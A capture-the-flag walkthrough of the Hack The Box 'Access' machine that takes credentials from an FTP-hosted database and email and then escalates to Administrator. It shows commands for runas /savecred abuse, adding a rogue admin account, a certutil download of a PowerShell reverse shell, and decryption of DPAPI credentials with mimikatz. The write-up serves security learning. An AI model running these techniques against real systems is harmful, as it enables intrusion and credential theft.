Access is an easy box, perfect to understand some Windows syntax and user limitations. To obtain the user flag we'll play with ftp, a mdb file and telnet. On the other hand, to escalate privileges we'll need to inspect a lnk file and abuse runas Windows command. And we also have an alternative way to escalate privileges using mimikatz to extract the Administrator's password.

User Privilege Escalation Alternative Privilege Escalation


First of all, run nmap to list versions and run default scripts. We can see we have ftp on port 21, telnet on port 23 and a IIS on port 80.

root@kali:~/htb/access# nmap -sC -sV
Starting Nmap 7.70 ( ) at 2019-01-25 12:37 EST
Nmap scan report for
Host is up (0.046s latency).
Not shown: 997 filtered ports
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

If we check the IIS server we'll see the following picture.

Nothing interesting here, so let's move forward.

We can connect as an anonymous user to the ftp server with read permissions.

root@kali:~/htb/access# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.

We have two folders Backups and Engineer with backup.mdb and Access files inside of them, respectively. Download both using binary mode, because we are working with files which contain binary data.

ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
ftp> bin
200 Type set to I.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 2.70 secs (1.9976 MB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access
226 Transfer complete.
ftp> get "Access"
local: Access remote: Access
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10870 bytes received in 0.19 secs (56.5916 kB/s)

The first file is a Microsoft Access Database.

root@kali:~/htb/access# file backup.mdb 
backup.mdb: Microsoft Access Database

We're using mdb-tables to list all the tables in the database.

root@kali:~/htb/access# mdb-tables backup.mdb 
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx

Using mdb-export we can see the rows in each table. After checking some of them we can find some credentials in auth_user.

root@kali:~/htb/access# mdb-export backup.mdb auth_user
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Going to the other file we downloaded from the ftp server, we have a password protected zip. Use one of the obtained passwords from the database (access4u@security) to extract its content.

root@kali:~/htb/access# 7z e Access\ -paccess4u@security

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-5700HQ CPU @ 2.70GHz (40671),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access
Path = Access
Type = zip
Physical Size = 10870

Everything is Ok

Size:       271360
Compressed: 10870

Inside of the zip we have an Outlook folder. To retrieve the emails inside we can use readpst which will create a Access Control.mbox file.

root@kali:~/htb/access# file Access\ Control.pst 
Access Control.pst: Microsoft Outlook email folder (>=2003)
root@kali:~/htb/access# readpst Access\ Control.pst 
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

We can use cat directly to read the content of the mbox file. Here we have John's mail where he is sending the password for the security account in plain text.

root@kali:~/htb/access# cat Access\ Control.mbox 
From "" Thu Aug 23 19:44:07 2018
Status: RO
From: <>
Subject: MegaCorp Access Control System "security" account
To: ''
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;

Content-Type: multipart/alternative;

Content-Type: text/plain; charset="utf-8"

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.


Use the obtained credentials to connect to the machine via telnet.

root@kali:~/htb/access# telnet
Connected to
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 4Cc3ssC0ntr0ller

Microsoft Telnet Server.

We have the user flag in security's desktop.

C:\Users\security\Desktop>type user.txt

Privilege Escalation

After some enumeration we can find a strange .lnk in Public's desktop.

 Directory of C:\Users\Public\Desktop

08/28/2018  06:51 AM    <DIR>          .
08/28/2018  06:51 AM    <DIR>          ..
07/14/2009  04:57 AM               174 desktop.ini
08/22/2018  09:18 PM             1,870 ZKAccess3.5 Security System.lnk
               2 File(s)          2,044 bytes

If we read the file, among all the crap, we can find that the shortcut is using runas to run C:\ZKTeco\ZKAccess3.5\Access.exe as ACCESS\Administrator without specifying a password.

C:\Users>type C:\Users\Public\Desktop\"ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
runas.exe��:1��:1�*Yrunas.exeL-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
)ΰ[�	��1SPS�XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500

This could mean we can use runas with the /savecred flag, which allows to run the command as Administrator.

But we have a little problem here, runas is not echoing its output for some reason, so we won't see errors and that means we will have to be sure we are using the right syntax.

C:\temp>runas /?

I decided I would create my own administrator account which would also be able to connect via telnet adding it to the correct localgroups.

C:\temp>runas /user:ACCESS\Administrator /savecred "net user /add manolo Caca123"
C:\temp>runas /user:ACCESS\Administrator /savecred "net localgroup administrators manolo /add"
C:\temp>runas /user:ACCESS\Administrator /savecred "net localgroup TelnetClients manolo /add"

But even using that administrator account I found I couldn't ACCESS to the Administrator folder.

C:\Users>cd Administrator
Access is denied.

So instead, I used an even easier method to retrieve the flag. Keep in mind that runas doesn't like windows internal commands, that's why we have to use cmd /c before type (I spent far more time to see this than I'd like to admit).

C:\temp>runas /user:ACCESS\Administrator /savecred "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\temp\caca"

That's the easy way, but we will use PowerShell to get a full administrator shell instead.

Modify nishang's Invoke-PowerShellTcp.ps1 to add the following line at the end of the file which will invoke the reverse shell.

Invoke-PowerShellTcp -Reverse -IPAddress -Port 6969

Serve the file using SimpleHTTPServer python module on our box and use certutil to download the PowerShell script.

C:\temp>certutil -f -split -urlcache
****  Online  ****
  0000  ...
CertUtil: -URLCache command completed successfully.

Use runas to run our script as Administrator.

C:\temp>runas /user:ACCESS\Administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\temp\caca.ps1"

If we listen on the port specified, we get a PS reverse shell as Administrator.

root@kali:~/htb/access# nc -nlvp 6969
Ncat: Version 7.70 ( )
Ncat: Listening on :::6969
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami

Now we can access to the administrator desktop and read root.txt.

PS C:\Users\Administrator\Desktop> type root.txt

Alternative Privilege Escalation

Thanks to @kabutor_ for this alternative way to escalate privileges.

As we saw before, we can execute runas as Administrator, that means his credentials are stored somewhere in the machine, so we're going to retrieve them to simply extract the password and then login as him.

To do that we first need the masterkey stored in %appdata%\Microsoft\Protect\<SID>\<masterkey>.

C:\>cd %appdata%\Microsoft\Protect

C:\Users\security\AppData\Roaming\Microsoft\Protect>dir /a
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\AppData\Roaming\Microsoft\Protect

08/22/2018  09:18 PM    <DIR>          .
08/22/2018  09:18 PM    <DIR>          ..
08/22/2018  09:18 PM                24 CREDHIST
08/22/2018  09:18 PM    <DIR>          S-1-5-21-953262931-566350628-63446256-1001
               1 File(s)             24 bytes
               3 Dir(s)  16,672,870,400 bytes free

Here we only have one SID with one masterkey in it, so it should be the one we are looking for.

C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>dir /a
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001

08/22/2018  09:18 PM    <DIR>          .
08/22/2018  09:18 PM    <DIR>          ..
08/22/2018  09:18 PM               468 0792c32e-48a5-4fe3-8b43-d93d64590580
08/22/2018  09:18 PM                24 Preferred
               2 File(s)            492 bytes
               2 Dir(s)  16,767,504,384 bytes free

Use certutil to encode it to base64 to be able to copy paste it outside the machine.

C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 C:\temp\caca

C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>type C:\temp\caca

We will also need the credentials stored in %appdata%\Microsoft\Credentials\<credentials>.

C:\>cd %appdata%\Microsoft\Credentials

C:\Users\security\AppData\Roaming\Microsoft\Credentials>dir /a
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\AppData\Roaming\Microsoft\Credentials

08/22/2018  09:18 PM    <DIR>          .
08/22/2018  09:18 PM    <DIR>          ..
08/22/2018  09:18 PM               538 51AB168BE4BDB3A603DADE4F8CA81290
               1 File(s)            538 bytes
               2 Dir(s)  16,760,569,856 bytes free

Use the same method to encode it to base64.

C:\Users\security\AppData\Roaming\Microsoft\Credentials>certutil -encode 51AB168BE4BDB3A603DADE4F8CA81290 C:\temp\pipi

C:\Users\security\AppData\Roaming\Microsoft\Credentials>type C:\temp\pipi

Now copy paste both files to a Windows machine with mimikatz and decode them with certutil again to get the original ones.

C:\Users\User\Documents>certutil -decode caca 0792c32e-48a5-4fe3-8b43-d93d64590580
C:\Users\User\Documents>certutil -decode pipi 51AB168BE4BDB3A603DADE4F8CA81290

Next, using mimikatz we're going to decrypt the masterkey indicating the user's SID and password.

mimikatz # dpapi::masterkey /in:C:\Users\User\Documents\0792c32e-48a5-4fe3-8b43-d93d64590580 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
  dwVersion          : 00000002 - 2
  szGuid             : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
    dwVersion        : 00000002 - 2
    salt             : 9c51ca4d00708c73d4fbff60b95e549e
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412

    dwVersion        : 00000002 - 2
    salt             : 4bb6dd9b5b9656d97b78f114796457f4
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa

    dwVersion        : 00000003 - 3
    guid             : {009668e5-9305-401b-ba0d-dfa0e11b34d0}

[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
  key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
  sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe

If everything works as expected, mimikatz should place the decrypted masterkey in cache.

mimikatz # dpapi::cache




Now we can read the credentials file and extract the Administrator's password.

mimikatz # dpapi::cred /in:C:\Users\User\Documents\51AB168BE4BDB3A603DADE4F8CA81290
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
  dwDataLen          : 00000100 - 256
  pbData             : e73542ff71d08529f9da5ff88edcd5be44d11c9c02c45fdfd9ee5a531628cb0f9e8dc221eb5b4d83a857aff13473131c927527217fe177e08d63a63eb5ce5341576b33332806e062363e58786fb7551aaa2e0676b8e3957f43cf1f11a2ed149c431104e5f93f20364916df25a0168ede23788bd9d71192cdb661c5c5686ed256c8691057fe6fe2a2b1765ba0979ee9140c010210eea81ac00830f74c35a196ac1f46bd69d7a86ca82da15f9bbcf1c40cbbe41d58d4a8924afde97e2a99a6e9f33a297ef2508401c229a451b911e9469ba17d71288dc6c37ee26c65ecc8accd4b5b3c0c2ccfcae6b0a76384a0e27c4edb7a0ecece2afd9889252304db5767bbc3
  dwSignLen          : 00000040 - 64
  pbSign             : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99

Decrypting Credential:
 * volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe
  credFlags      : 00000030 - 48
  credSize       : 000000f4 - 244
  credUnk0       : 00002004 - 8196

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 8/22/2018 9:18:49 PM
  unkFlagsOrSize : 00000038 - 56
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=ACCESS\Administrator
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : ACCESS\Administrator
  CredentialBlob : 55Acc3ssS3cur1ty@megacorp
  Attributes     : 0

With the retrieved password we can connect via telnet as Administrator.

root@kali:~/htb/access# telnet
Connected to
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: administrator
password: 55Acc3ssS3cur1ty@megacorp

Microsoft Telnet Server.